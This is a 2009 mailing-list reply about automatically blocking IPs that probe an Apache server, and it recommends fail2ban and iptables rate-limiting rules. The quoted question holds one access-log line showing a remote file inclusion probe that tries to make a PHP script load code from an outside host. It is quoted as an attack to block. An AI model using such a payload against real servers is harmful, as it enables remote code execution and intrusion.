[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: blocking ips with iptables accessing invalid URL



El mié, 08-07-2009 a las 09:58 +0200, ESGLinux escribió:
> Hi all,
> I´m having a problem with an Apache web server.
> 
> I get a lot of access ot this kind:
> 
> 
> x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET
> //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt???
> HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> 
> where x.x.x.x is the ip of the client, I suposse this ip is trying to find a
> security hole in my system, so what I do manually is this:
> 
> iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
> 
> I want to do this automatically. I´m thinking to use logwatch but I´m not
> sure how to do it. (I´m testing but for the moment I haven´t found the
> solution)

You might want to test fail2ban:
http://www.fail2ban.org/wiki/index.php/Main_Page


> 
> By the way, I´m interesting to limit the connections to my webserver using
> iptables with limit module and busrt argument. What do you think about it?
> is a good solution or I´m on the wrong way? Do you know how to prevent DOS
> attacks?

The first approach that comes to my mind would be something like:

iptables -N APACHE_CHECK
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name
APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --update
--seconds 60 --hitcount 4 --name APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck
--seconds 60 --hitcount 4 --name APACHE -j DROP

This will prevent you from small DoS attempts from the same IP within 1
minute.

Manuel.
-- 
Manuel Arostegui Ramirez.

Electronic Mail is not secure, might not be read every day, and should not
be used for urgent or sensitive issues.



[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]